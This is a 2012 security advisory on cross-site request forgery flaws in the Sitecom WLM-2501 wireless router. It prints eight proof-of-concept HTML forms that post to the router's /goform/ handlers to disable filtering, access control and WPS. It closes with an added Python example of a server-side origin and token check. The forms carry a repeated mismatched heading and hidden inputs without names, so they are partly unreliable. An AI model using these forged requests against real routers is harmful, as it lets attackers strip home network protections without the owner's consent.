2501 Multiple Cross-Site Request Forgery Vulnerabilities

Release date: 2012-03-21
Update date: 2012-03-27

Affected systems:
Sitecom WLM-2501
Description:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 52700

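The Sitecom WLM-2501 is a Wireless Modem Router 300N with a web management interface that listens on TCP/IP port 80 by default. The default administrator is admin and the default IP address is 192.168.0.1.

The Sitecom WLM-2501 implementation contains multiple cross-site request forgery vulnerabilities. An attacker can exploit them to gain unauthorized access to the affected device and perform certain administrator actions, changing the following router parameters: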

- Disable Mac Filtering
- Disable/Modify IP/Port Filtering
- Disable/Modify Port Forwarding
- Disable/Modify Wireless Access Control
- Disable Wi-Fi Protected Setup
- Disable/Modify URL Blocking Filter
- Disable/Modify Domain Blocking Filter
- Disable/Modify IP Address ACL
- Change Wireless Passphrase
- Enable/Modify Remote Access (also on WAN interface)

<*Source: Ivano Binetti
 
  Link:
       
*>

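Test method:
--------------------------------------------------------------------------------

WARNING

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

Ivano Binetti provided the following test methods: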
3.1 Disable Mac Filtering
<html>
<body>
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" action="http://192.168.0.1:80/goform/admin/formFilter">
<input type="hidden" value="1"/>
<input type="hidden" value="1"/>
<input type="hidden" value="Apply"/>
<input type="hidden" value="/fw-macfilter.asp"/>
</form>
</body>
</html>
3.2 Disable IP/Port Filtering
<html>
<body>
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" action="http://192.168.0.1:80/goform/formFilter">
<input type="hidden" value="1"/>
<input type="hidden" value="1"/>
<input type="hidden" value="Apply"/>
<input type="hidden" value="/fw-ipportfilter.asp"/>
</form>
</body>
</html>
3.3 Disable Port Forwarding
<html>
<body>
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" action="http://192.168.0.1:80/goform/formPortFw">
<input type="hidden" value="0"/>
<input type="hidden" value="Apply"/>
<input type="hidden" value=""/>
<input type="hidden" value="/fw-portfw.asp"/>
</form>
</body>
</html>
3.4 Disable Wireless Access Control
<html>
<body>
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" action="http://192.168.0.1:80/goform/admin/formWlAc">
<input type="hidden" value="0"/>
<input type="hidden" value="Apply"/>
<input type="hidden" value="/wlactrl.asp"/>
</form>
</body>
</html>
3.5 Disable Wi-Fi Protected Setup
<html>
<body>
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" action="http://192.168.0.1:80/goform/formWsc">
<input type="hidden" value="OFF"/>
<input type="hidden" value="ON"/>
<input type="hidden" value="/wlwps.asp"/>
<input type="hidden" value="Apply"/>
</form>
</body>
</html>
3.6 Disable URL Blocking Filter
<html>
<body>
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" action="http://192.168.0.1:80/goform/formURL">
<input type="hidden" value="0"/>
<input type="hidden" value="Apply"/>
<input type="hidden" value=""/>
<input type="hidden" value=""/>
<input type="hidden" value="/url_blocking.asp"/>
</form>
</body>
</html>
3.7 Disable Domain Blocking Filter
<html>
<body>
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" action="http://192.168.0.1:80/goform/formDOMAINBLK">
<input type="hidden" value="0"/>
<input type="hidden" value="Apply"/>
<input type="hidden" value=""/>
<input type="hidden" value="/domainblk.asp"/>
</form>
</body>
</html>
3.8 Disable IP Address ACL Filter
<html>
<body>
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" action="http://192.168.0.1:80/goform/admin/formACL">
<input type="hidden" value="192.168.0.1"/>
<input type="hidden" value="255.255.255.0"/>
<input type="hidden" value="0"/>
<input type="hidden" value="Apply"/>
<input type="hidden" value="1"/>
<input type="hidden" value="0"/>
<input type="hidden" value=""/>
<input type="hidden" value=""/>
<input type="hidden" value="/acl.asp"/>
</form>
</body>
</html>
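
The forms above work because the /goform/ handlers act on any POST that arrives from the administrator's browser, wherever the page that sent it was loaded from. As an added example (not code from the original advisory, the researcher, or Sitecom), the following shows the server-side check a patched handler would need: same-origin verification plus a per-session token. The csrf_token field name and the sample requests are assumptions constructed for illustration.

```python
import hmac
import secrets
from urllib.parse import urlsplit

PROTECTED_PREFIX = "/goform/"   # handler path prefix taken from the form actions above
TOKEN_FIELD = "csrf_token"      # hypothetical field name, not a real firmware parameter


def new_session_token() -> str:
    """Unpredictable per-session value, embedded as a hidden field in every admin page."""
    return secrets.token_hex(16)


def same_origin(headers: dict) -> bool:
    """True only if Origin (or, failing that, Referer) names the host being addressed."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # fail closed: a settings change with no provenance is rejected
    parts = urlsplit(source)
    return parts.scheme in ("http", "https") and parts.netloc == headers.get("Host", "")


def check_request(method, path, headers, form, session_token):
    """Return None if the request may proceed, else the reason it is rejected."""
    if method != "POST" or not path.startswith(PROTECTED_PREFIX):
        return None  # only state-changing handlers are guarded here
    if not same_origin(headers):
        return "cross-origin"
    supplied = form.get(TOKEN_FIELD, "")
    if not hmac.compare_digest(supplied.encode(), session_token.encode()):
        return "bad-token"
    return None


# Constructed sample requests (not captured traffic): (method, path, headers, form).
TOKEN = new_session_token()
LEGIT = ("POST", "/goform/formWsc",
         {"Host": "192.168.0.1", "Origin": "http://192.168.0.1"},
         {TOKEN_FIELD: TOKEN})
FORGED = ("POST", "/goform/formWsc",
          {"Host": "192.168.0.1", "Origin": "http://attacker.example"},
          {})  # a third-party page cannot read the token, so it cannot send it

if __name__ == "__main__":
    for name, req in (("legit", LEGIT), ("forged", FORGED)):
        print(name, "->", check_request(*req, TOKEN) or "accepted")
```
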

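Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

Sitecom
-------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version: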
